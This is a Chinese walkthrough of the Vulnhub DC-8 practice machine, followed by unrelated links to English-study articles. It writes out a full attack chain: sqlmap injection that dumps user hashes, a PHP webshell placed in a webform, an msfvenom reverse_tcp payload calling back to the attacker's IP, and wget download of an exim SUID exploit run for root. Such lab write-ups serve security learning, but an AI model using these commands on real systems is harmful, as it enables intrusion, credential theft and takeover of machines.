[Vulnhub] DC-8
创始人
2024-05-21 01:33:16
0

下载链接:https://download.vulnhub.com/dc/DC-8.zip

知识点:

  • sqlmap 注入出用户名密码
  • msfvenom 生成脚本+msf反弹shell
  • suid-exim 提权

目录

<1> 信息搜集

<2> 反弹shell

(1) 利用kali自带webshell代码

(2) msfvenom制作反弹shell脚本

<3> Privilege Escalation(suid-exim提权)


<1> 信息搜集

扫一下靶机的ip

nmap -sP 192.168.236.0/24 扫描一下靶机ip

靶机ip: 192.168.236.138

nmap -A -p 1-65535 192.168.236.138 扫描一下靶机开放哪些服务

开放了22端口的 ssh服务和80 http服务

 url栏中有一个?nid=1  改变为2 就是Who We Are 可能存在sql注入漏洞 加上 ' 验证一下

 出现sql报错语句,存在整形注入 1 and 1=1 正常 1 and 1=2报错

上sqlmap,  爆一下数据库

sqlmap -u "http://192.168.236.138/?nid=1" --batch --dbs

 得到数据库 d7db, 然后爆一下表名

sqlmap -u "http://192.168.236.138/?nid=1" --batch -D d7db --tables   

 sqlmap -u "http://192.168.236.138/?nid=1" --batch -D d7db -T users --columns 

爆一下字段

 sqlmap -u "http://192.168.236.138/?nid=1" --batch -D d7db -T users -C "name,pass" --dump

得到name和pass:

| admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john  | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |

把两个密文写入txt,然后john爆破一下,只爆出来一个turtle

回到登录界面 /user/login

成功登录 john    但是ssh连接不了

 

<2> 反弹shell

(1) 利用kali自带webshell代码

 在webform里的 Form settings 发现可以编辑执行php代码

往contact us里写入webshell(kali里有 前面文章也发过)

注:不能只有php代码,前面还有有一段html 比如:

Success

否则php代码不执行

 之后回到contact us那里 submit

转为交互式

python -c 'import pty;pty.spawn("/bin/bash")'

(2) msfvenom制作反弹shell脚本

 使用msfvenom制作反弹shell脚本

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.236.128 lport=4444 R >shell.txt

把生成的php代码复制到 contact us_settings那里

kali设置msf选项 use multi/handler,进行监听kali的4444端口

run 开启监听后,submit 之前生成的shell脚本执行之后   shell 然后python转为交互式:

<3> Privilege Escalation(suid-exim提权)

查看具有SUID的二进制可执行文件

find / -user root -perm -4000 -print 2>/dev/null

发现exim4命令   --version 得到版本为 exim4 4.89

 searchsploit exim

发现可利用的提权脚本  46996.sh

searchsploit -m 46996.sh 下载下来。

python -m http.server 1234  开启一个http服务

然后回到靶机的shell里

cd /tmp
wget http://192.168.236.128:1234/46996.sh
chmod 777 46996.sh
./46996.sh -m netcat

 拿到flag

 

 

相关内容

热门资讯

常用商务英语口语   商务英语是以适应职场生活的语言要求为目的,内容涉及到商务活动的方方面面。下面是小编收集的常用商务...
六年级上册英语第一单元练习题   一、根据要求写单词。  1.dry(反义词)__________________  2.writ...
复活节英文怎么说 复活节英文怎么说?复活节的英语翻译是什么?复活节:Easter;"Easter,anniversar...
2008年北京奥运会主题曲 2008年北京奥运会(第29届夏季奥林匹克运动会),2008年8月8日到2008年8月24日在中华人...
英语道歉信 英语道歉信15篇  在日常生活中,道歉信的使用频率越来越高,通过道歉信,我们可以更好地解释事情发生的...
六年级英语专题训练(连词成句... 六年级英语专题训练(连词成句30题)  1. have,playhouse,many,I,toy,i...
上班迟到情况说明英语   每个人都或多或少的迟到过那么几次,因为各种原因,可能生病,可能因为交通堵车,可能是因为天气冷,有...
小学英语教学论文 小学英语教学论文范文  引导语:英语教育一直都是每个家长所器重的,那么有关小学英语教学论文要怎么写呢...
英语口语学习必看的方法技巧 英语口语学习必看的方法技巧如何才能说流利的英语? 说外语时,我们主要应做到四件事:理解、回答、提问、...
四级英语作文选:Birth ... 四级英语作文范文选:Birth controlSince the Chinese Governmen...
金融专业英语面试自我介绍 金融专业英语面试自我介绍3篇  金融专业的学生面试时,面试官要求用英语做自我介绍该怎么说。下面是小编...
我的李老师走了四年级英语日记... 我的李老师走了四年级英语日记带翻译  我上了五个学期的小学却换了六任老师,李老师是带我们班最长的语文...
小学三年级英语日记带翻译捡玉... 小学三年级英语日记带翻译捡玉米  今天,我和妈妈去外婆家,外婆家有刚剥的`玉米棒上带有玉米籽,好大的...
七年级英语优秀教学设计 七年级英语优秀教学设计  作为一位兢兢业业的人民教师,常常要写一份优秀的教学设计,教学设计是把教学原...
我的英语老师作文 我的英语老师作文(通用21篇)  在日常生活或是工作学习中,大家都有写作文的经历,对作文很是熟悉吧,...
英语老师教学经验总结 英语老师教学经验总结(通用19篇)  总结是指社会团体、企业单位和个人对某一阶段的学习、工作或其完成...
初一英语暑假作业答案 初一英语暑假作业答案  英语练习一(基础训练)第一题1.D2.H3.E4.F5.I6.A7.J8.C...
大学生的英语演讲稿 大学生的英语演讲稿范文(精选10篇)  使用正确的写作思路书写演讲稿会更加事半功倍。在现实社会中,越...
VOA美国之音英语学习网址 VOA美国之音英语学习推荐网址 美国之音网站已经成为语言学习最重要的资源站点,在互联网上还有若干网站...
商务英语期末试卷 Part I Term Translation (20%)Section A: Translate ...